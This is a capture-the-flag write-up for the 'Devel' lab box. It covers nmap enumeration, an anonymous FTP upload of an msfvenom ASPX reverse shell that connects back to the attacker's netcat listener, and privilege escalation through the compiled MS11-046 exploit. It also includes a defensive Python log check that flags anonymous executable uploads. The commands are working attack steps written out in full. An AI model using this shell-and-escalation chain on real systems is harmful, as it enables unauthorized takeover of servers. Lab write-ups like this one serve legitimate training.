created by ch4p // 10.10.10.5
// Enumeration //
The initial foothold on Devel is fairly simple, but we do finally get to do a bit of privilege escalation. We’ll get to use some new tools and new protocols this go around. But to kick it off, we’ll be using the default nmap scan we’ve used on the two previous machines.
nmap -Pn -A -p- -v 10.10.10.5 -oG /home/rp/Desktop/Devel/nmap
From our output, we see only two ports open: FTP on 21, with anonymous login allowed (oh goodie), and port 80 with Microsoft IIS. This is a good chance to try out one of my favorite tools, dirb. Sadly, we won’t get any useful results, but the syntax is useful to know regardless.
dirb http://10.10.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
// Exploitation //
Our other avenue is FTP. If you aren’t familiar with FTP, it has a unique set of commands that go along with it. This protocol actually runs on two ports, 20 & 21, with commands being passed on 21 and data on 20. Let’s try an anonymous login.
ftp 10.10.10.5
The username is anonymous, and the password can be literally anything.
It lets us in, and we’re able to list directories. Let’s see if we can upload a file, using the ‘put’ command.
And then we’ll browse to that file on the web server in our browser.
Success. So let’s try getting a reverse shell on there. We can use FTP for the transfer, and then execute the program by browsing to it. Hopefully. The web server is running Microsoft IIS, which runs ASP/ASPX code. We’ll use msfvenom to create a shell to upload.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.23 LPORT=2901 -f aspx > totallysafe.aspx
nc -lvnp 2901
Replace the LHOST with your IP, jump back to your FTP session, and let’s upload this thing.
Note: when uploading a compiled program, picture, PDF, etc. over FTP, you’ll need to use binary transfer mode.
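The reason the upload trick works is that the anonymous FTP root is also the IIS web root, so anything stored over FTP is served by the web server (and, for .aspx, executed). As an added example that is not part of this write-up, here is a small Python check a defender could run over the IIS FTP service’s W3C log to flag successful anonymous STORs of executable content and whether they landed under the web root; the log lines, the field set and the web-root path are constructed assumptions.

```python
"""Detect anonymous FTP uploads of web-executable content in an IIS W3C FTP log."""
from typing import Dict, Iterable, List

# Extensions IIS will execute, or that carry native code, if they land in the web root.
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".exe", ".dll"}
ANON_USERS = {"anonymous", "ftp"}
WEB_ROOT = "c:\\inetpub\\wwwroot\\"  # assumed site root, as on the box

# Constructed sample log in the W3C layout the IIS FTP service writes; not real data.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status x-fullpath
2023-01-01 10:00:01 10.10.14.23 anonymous USER anonymous 331 -
2023-01-01 10:00:02 10.10.14.23 anonymous PASS *** 230 -
2023-01-01 10:00:05 10.10.14.23 anonymous LIST / 226 C:\\inetpub\\wwwroot
2023-01-01 10:00:09 10.10.14.23 anonymous STOR /totallysafe.aspx 226 C:\\inetpub\\wwwroot\\totallysafe.aspx
2023-01-01 10:01:30 10.10.14.23 anonymous STOR /notes.txt 226 C:\\inetpub\\wwwroot\\notes.txt
2023-01-01 10:02:00 10.10.14.23 anonymous STOR /40564.exe 226 C:\\inetpub\\wwwroot\\40564.exe
2023-01-01 11:00:00 10.10.14.40 bob STOR /report.aspx 226 C:\\ftproot\\bob\\report.aspx
"""

def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Turn W3C extended-log lines into dicts keyed by the #Fields header."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # header names the columns that follow
        elif line.startswith("#") or not line.strip():
            continue  # other directives and blank lines
        elif fields:
            records.append(dict(zip(fields, line.split())))
    return records

def find_anonymous_executable_uploads(log_text: str) -> List[Dict[str, str]]:
    """Return successful STORs by anonymous users of executable files; mark web-root hits."""
    hits: List[Dict[str, str]] = []
    for rec in parse_w3c(log_text.splitlines()):
        user = rec.get("cs-username", "").lower()
        name = rec.get("cs-uri-stem", "").lower()
        if rec.get("cs-method") != "STOR" or user not in ANON_USERS:
            continue
        if not rec.get("sc-status", "").startswith("2"):
            continue  # upload was refused or failed
        if not any(name.endswith(ext) for ext in EXECUTABLE_EXT):
            continue
        rec["in_web_root"] = rec.get("x-fullpath", "").lower().startswith(WEB_ROOT)
        hits.append(rec)
    return hits
```

On the sample log this flags the .aspx and .exe uploads (both under the web root) and ignores the text file and the authenticated user’s upload.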
// Privilege Escalation //
We’ve established a basic shell; however, we’re unable to access any of the user directories. Time to escalate. ‘systeminfo’ will give us a good snapshot of what state the machine is in.
So, priv esc shouldn’t be too rough. Right down near the bottom there, you’ll see ‘Hotfix(s): N/A’. That phrase should give anyone who has ever owned a computer night terrors. Let’s turn to the all-knowing Google, with a quick search for our version number. The second result looks promising, MS11-046. A few housekeeping steps, and we’ll have root.
sudo searchsploit -u
searchsploit -m 40564
sudo apt-get update
sudo apt-get install mingw-w64
The exploit quite handily comes with compiling instructions:
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
And now all that’s left is to upload it onto our target machine, and let the shells rain upon us. We’ll use FTP in binary mode for this.
It’ll place it into the C:\inetpub\wwwroot\ directory by default, so just quickly navigate over, execute it, and we have system.
And our flags: